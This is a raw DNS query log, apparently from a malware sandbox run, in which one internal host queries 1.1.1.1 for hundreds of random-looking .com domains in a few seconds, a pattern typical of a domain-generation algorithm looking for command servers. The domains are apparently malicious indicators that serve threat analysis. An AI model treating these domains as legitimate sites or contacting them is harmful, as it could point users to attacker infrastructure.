                                                                                                                                                                                                          Sep 8, 2024 10:53:38.201319933 CEST192.168.2.91.1.1.10x90daStandard query (0)lyvynen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.201467037 CEST192.168.2.91.1.1.10xa2e7Standard query (0)vonyjim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.201638937 CEST192.168.2.91.1.1.10xb619Standard query (0)pujypup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.206682920 CEST192.168.2.91.1.1.10xe2afStandard query (0)gahycib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.207171917 CEST192.168.2.91.1.1.10x64a5Standard query (0)qekyvav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.207171917 CEST192.168.2.91.1.1.10xc4d4Standard query (0)vocybam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.207746983 CEST192.168.2.91.1.1.10xc908Standard query (0)puvybeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.526453972 CEST192.168.2.91.1.1.10x3507Standard query (0)lygytyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.526973963 CEST192.168.2.91.1.1.10xe7e4Standard query (0)lysywon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.531256914 CEST192.168.2.91.1.1.10xe1bStandard query (0)lyxyvoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.532898903 CEST192.168.2.91.1.1.10x5bf2Standard query (0)pufytev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.533042908 CEST192.168.2.91.1.1.10x2fbbStandard query (0)vonygec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.534055948 CEST192.168.2.91.1.1.10x4d43Standard query (0)gaqyhuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.534276009 CEST192.168.2.91.1.1.10x3fb7Standard query (0)vowyjut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.535137892 CEST192.168.2.91.1.1.10x281fStandard query (0)qeqyhup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.535831928 CEST192.168.2.91.1.1.10xcd97Standard query (0)qexyvoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.536179066 CEST192.168.2.91.1.1.10xbf24Standard query (0)volypum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.536375046 CEST192.168.2.91.1.1.10x59d0Standard query (0)volycik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.537132978 CEST192.168.2.91.1.1.10x438cStandard query (0)lymygyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.537859917 CEST192.168.2.91.1.1.10xa4e2Standard query (0)qetyhyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.538893938 CEST192.168.2.91.1.1.10xc44bStandard query (0)puzyciq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.539534092 CEST192.168.2.91.1.1.10x52a2Standard query (0)vofyref.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.539586067 CEST192.168.2.91.1.1.10x3cfbStandard query (0)galycuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.540354013 CEST192.168.2.91.1.1.10x80f9Standard query (0)gadyrab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.540379047 CEST192.168.2.91.1.1.10x8623Standard query (0)puvycip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.540960073 CEST192.168.2.91.1.1.10xced2Standard query (0)pumygyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.540996075 CEST192.168.2.91.1.1.10x6ae1Standard query (0)qedyrag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.542483091 CEST192.168.2.91.1.1.10xa8feStandard query (0)lyvyvix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.551500082 CEST192.168.2.91.1.1.10xbe96Standard query (0)gatyhub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.553257942 CEST192.168.2.91.1.1.10x7362Standard query (0)vojyrak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.566754103 CEST192.168.2.91.1.1.10x7bb6Standard query (0)qebyvop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.574208975 CEST192.168.2.91.1.1.10xd6aeStandard query (0)pujyteq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.581943989 CEST192.168.2.91.1.1.10x37abStandard query (0)vowymyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.584872007 CEST192.168.2.91.1.1.10xbc44Standard query (0)vonybat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.586900949 CEST192.168.2.91.1.1.10xc5eaStandard query (0)qedykiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.603713036 CEST192.168.2.91.1.1.10x2e14Standard query (0)lysyjid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.604300022 CEST192.168.2.91.1.1.10x3a68Standard query (0)lymyner.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.604599953 CEST192.168.2.91.1.1.10x3850Standard query (0)vofykoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.604840994 CEST192.168.2.91.1.1.10x3b01Standard query (0)pufylap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.605113983 CEST192.168.2.91.1.1.10x310cStandard query (0)gadykos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.605441093 CEST192.168.2.91.1.1.10xaa88Standard query (0)puzypug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.605678082 CEST192.168.2.91.1.1.10x2b1cStandard query (0)qexysig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.605937004 CEST192.168.2.91.1.1.10xf94cStandard query (0)pumybal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.606086016 CEST192.168.2.91.1.1.10xe6bcStandard query (0)pupyjuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.606244087 CEST192.168.2.91.1.1.10xc8c2Standard query (0)ganyvoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.606609106 CEST192.168.2.91.1.1.10x7e48Standard query (0)gaqynyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.608087063 CEST192.168.2.91.1.1.10x745eStandard query (0)lyxysun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.608392954 CEST192.168.2.91.1.1.10xed1cStandard query (0)qeqynel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.609174967 CEST192.168.2.91.1.1.10x9ddaStandard query (0)lykytej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.609663010 CEST192.168.2.91.1.1.10x4d45Standard query (0)vopyjuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.614259005 CEST192.168.2.91.1.1.10x4be4Standard query (0)galypyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.641496897 CEST192.168.2.91.1.1.10x8331Standard query (0)qekytyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.652734995 CEST192.168.2.91.1.1.10xd2e1Standard query (0)gatyqih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.653635979 CEST192.168.2.91.1.1.10x4d8eStandard query (0)lykyxur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.661799908 CEST192.168.2.91.1.1.10x546fStandard query (0)lyvyfad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.662138939 CEST192.168.2.91.1.1.10xa793Standard query (0)vojyzyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.664545059 CEST192.168.2.91.1.1.10xeeceStandard query (0)purymuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.667896032 CEST192.168.2.91.1.1.10x7790Standard query (0)qegylep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.669126987 CEST192.168.2.91.1.1.10xcf24Standard query (0)lyrymuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.669331074 CEST192.168.2.91.1.1.10x3b1cStandard query (0)vocydof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.669383049 CEST192.168.2.91.1.1.10xecf2Standard query (0)gahyzez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.669739962 CEST192.168.2.91.1.1.10x62b5Standard query (0)gacydib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.670406103 CEST192.168.2.91.1.1.10x7d47Standard query (0)lygylax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.670598984 CEST192.168.2.91.1.1.10x34ecStandard query (0)puvydov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.670963049 CEST192.168.2.91.1.1.10x218bStandard query (0)qetyquq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.672672987 CEST192.168.2.91.1.1.10x12a1Standard query (0)pupywog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.716490030 CEST192.168.2.91.1.1.10x938bStandard query (0)qekyxul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.717446089 CEST192.168.2.91.1.1.10x8b0cStandard query (0)qebyfav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.717602015 CEST192.168.2.91.1.1.10x2f99Standard query (0)pujyxyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.717767000 CEST192.168.2.91.1.1.10xb3d8Standard query (0)vopyqim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.717895985 CEST192.168.2.91.1.1.10x9e52Standard query (0)ganyfes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.077263117 CEST192.168.2.91.1.1.10x1045Standard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.078948021 CEST192.168.2.91.1.1.10x7efdStandard query (0)gahyraw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.087522984 CEST192.168.2.91.1.1.10xdd2Standard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.094549894 CEST192.168.2.91.1.1.10xc31cStandard query (0)gacycus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.095330000 CEST192.168.2.91.1.1.10x92a4Standard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.099030972 CEST192.168.2.91.1.1.10x88e4Standard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.110722065 CEST192.168.2.91.1.1.10xa284Standard query (0)lyrygyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.118674040 CEST192.168.2.91.1.1.10x6927Standard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.137268066 CEST192.168.2.91.1.1.10x9d01Standard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.137486935 CEST192.168.2.91.1.1.10x3e12Standard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.137649059 CEST192.168.2.91.1.1.10x5399Standard query (0)vopymyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.137880087 CEST192.168.2.91.1.1.10x6d14Standard query (0)ganycuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.138036013 CEST192.168.2.91.1.1.10x936eStandard query (0)gatynes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.138734102 CEST192.168.2.91.1.1.10x7d65Standard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.138947010 CEST192.168.2.91.1.1.10x64aeStandard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.139621019 CEST192.168.2.91.1.1.10x3ec0Standard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.139853954 CEST192.168.2.91.1.1.10xef57Standard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.140142918 CEST192.168.2.91.1.1.10xe1c4Standard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.140394926 CEST192.168.2.91.1.1.10x7c53Standard query (0)qedyhyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.141136885 CEST192.168.2.91.1.1.10x1ab2Standard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.141331911 CEST192.168.2.91.1.1.10xd0afStandard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.141968012 CEST192.168.2.91.1.1.10x389Standard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.142235994 CEST192.168.2.91.1.1.10xa1eeStandard query (0)vojykom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.142235994 CEST192.168.2.91.1.1.10xc80bStandard query (0)puvypul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.142441034 CEST192.168.2.91.1.1.10xa458Standard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.144015074 CEST192.168.2.91.1.1.10xeef2Standard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.145020962 CEST192.168.2.91.1.1.10xb84cStandard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.147146940 CEST192.168.2.91.1.1.10x9fadStandard query (0)qebyxyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.147624969 CEST192.168.2.91.1.1.10xa7f4Standard query (0)lyrynad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.148089886 CEST192.168.2.91.1.1.10x3e21Standard query (0)qegykiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.148772001 CEST192.168.2.91.1.1.10x19f7Standard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.150480986 CEST192.168.2.91.1.1.10x13e5Standard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.159730911 CEST192.168.2.91.1.1.10xfb4aStandard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.160027027 CEST192.168.2.91.1.1.10x9a1cStandard query (0)vocypyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.160027027 CEST192.168.2.91.1.1.10x8ee5Standard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.160214901 CEST192.168.2.91.1.1.10x668eStandard query (0)vocycuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.160240889 CEST192.168.2.91.1.1.10xb0d3Standard query (0)qegyrol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.160435915 CEST192.168.2.91.1.1.10x2f25Standard query (0)pupygel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.160677910 CEST192.168.2.91.1.1.10xd8f7Standard query (0)vopygat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.160993099 CEST192.168.2.91.1.1.10x11edStandard query (0)qekyrov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.161061049 CEST192.168.2.91.1.1.10x4406Standard query (0)lykywid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.161233902 CEST192.168.2.91.1.1.10xe0aeStandard query (0)purygeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.161389112 CEST192.168.2.91.1.1.10xbf2dStandard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.161555052 CEST192.168.2.91.1.1.10x5a55Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.172266960 CEST192.168.2.91.1.1.10x436bStandard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.173527956 CEST192.168.2.91.1.1.10xbf89Standard query (0)vowygem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.173719883 CEST192.168.2.91.1.1.10x840aStandard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.173823118 CEST192.168.2.91.1.1.10x2ae1Standard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.173974037 CEST192.168.2.91.1.1.10xc921Standard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.175122023 CEST192.168.2.91.1.1.10xacfdStandard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.175530910 CEST192.168.2.91.1.1.10x5fb1Standard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.175903082 CEST192.168.2.91.1.1.10x6cd5Standard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.176136971 CEST192.168.2.91.1.1.10x6991Standard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.176214933 CEST192.168.2.91.1.1.10xb908Standard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.176321030 CEST192.168.2.91.1.1.10xe0d9Standard query (0)qeqyfaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.176517963 CEST192.168.2.91.1.1.10xce99Standard query (0)vonycum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.176825047 CEST192.168.2.91.1.1.10x3f58Standard query (0)pufywil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.184293985 CEST192.168.2.91.1.1.10xad1cStandard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.185343027 CEST192.168.2.91.1.1.10x8418Standard query (0)lygywor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.185625076 CEST192.168.2.91.1.1.10xbb1aStandard query (0)qexyxuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.187593937 CEST192.168.2.91.1.1.10x5856Standard query (0)gaqyfah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.192651033 CEST192.168.2.91.1.1.10xb587Standard query (0)galyros.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.193006992 CEST192.168.2.91.1.1.10xf5bcStandard query (0)pujylog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:40.193317890 CEST192.168.2.91.1.1.10xd38aStandard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.673913956 CEST192.168.2.91.1.1.10x7d69Standard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.674545050 CEST192.168.2.91.1.1.10xef93Standard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.675309896 CEST192.168.2.91.1.1.10xa1a7Standard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.675426960 CEST192.168.2.91.1.1.10x2086Standard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.678431034 CEST192.168.2.91.1.1.10xd764Standard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.685762882 CEST192.168.2.91.1.1.10x9500Standard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.686399937 CEST192.168.2.91.1.1.10x2113Standard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.689151049 CEST192.168.2.91.1.1.10xbeb9Standard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.690027952 CEST192.168.2.91.1.1.10x3aeeStandard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.690582037 CEST192.168.2.91.1.1.10xfd7fStandard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.691524029 CEST192.168.2.91.1.1.10xf85eStandard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.691776991 CEST192.168.2.91.1.1.10x1153Standard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.697381020 CEST192.168.2.91.1.1.10xe20dStandard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.700290918 CEST192.168.2.91.1.1.10x13abStandard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.700567961 CEST192.168.2.91.1.1.10x1bd4Standard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.701852083 CEST192.168.2.91.1.1.10xb65bStandard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.702613115 CEST192.168.2.91.1.1.10x13f6Standard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.707176924 CEST192.168.2.91.1.1.10xd079Standard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.708267927 CEST192.168.2.91.1.1.10x4638Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.708698988 CEST192.168.2.91.1.1.10x1472Standard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.709536076 CEST192.168.2.91.1.1.10x8f86Standard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.718868017 CEST192.168.2.91.1.1.10x1b04Standard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.719423056 CEST192.168.2.91.1.1.10xa246Standard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.720164061 CEST192.168.2.91.1.1.10xd62fStandard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.720196009 CEST192.168.2.91.1.1.10x164cStandard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.721121073 CEST192.168.2.91.1.1.10x1c67Standard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.721496105 CEST192.168.2.91.1.1.10xa034Standard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.730288029 CEST192.168.2.91.1.1.10xb518Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.758579016 CEST192.168.2.91.1.1.10xdd80Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.760075092 CEST192.168.2.91.1.1.10x1787Standard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.760251999 CEST192.168.2.91.1.1.10xccfeStandard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.760500908 CEST192.168.2.91.1.1.10xb6cdStandard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.773746967 CEST192.168.2.91.1.1.10x58a6Standard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.773950100 CEST192.168.2.91.1.1.10x479aStandard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.775139093 CEST192.168.2.91.1.1.10xeafcStandard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.775228977 CEST192.168.2.91.1.1.10x248fStandard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.775353909 CEST192.168.2.91.1.1.10x748dStandard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.775536060 CEST192.168.2.91.1.1.10x2423Standard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.775726080 CEST192.168.2.91.1.1.10x2a4bStandard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.775753975 CEST192.168.2.91.1.1.10xc7f3Standard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.776252031 CEST192.168.2.91.1.1.10x9d20Standard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.787673950 CEST192.168.2.91.1.1.10xd184Standard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.787844896 CEST192.168.2.91.1.1.10xa6c2Standard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.791943073 CEST192.168.2.91.1.1.10x3310Standard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.793729067 CEST192.168.2.91.1.1.10x236cStandard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.793972015 CEST192.168.2.91.1.1.10x5154Standard query (0)puzywuq.comA (IP address)IN (0x0001)false
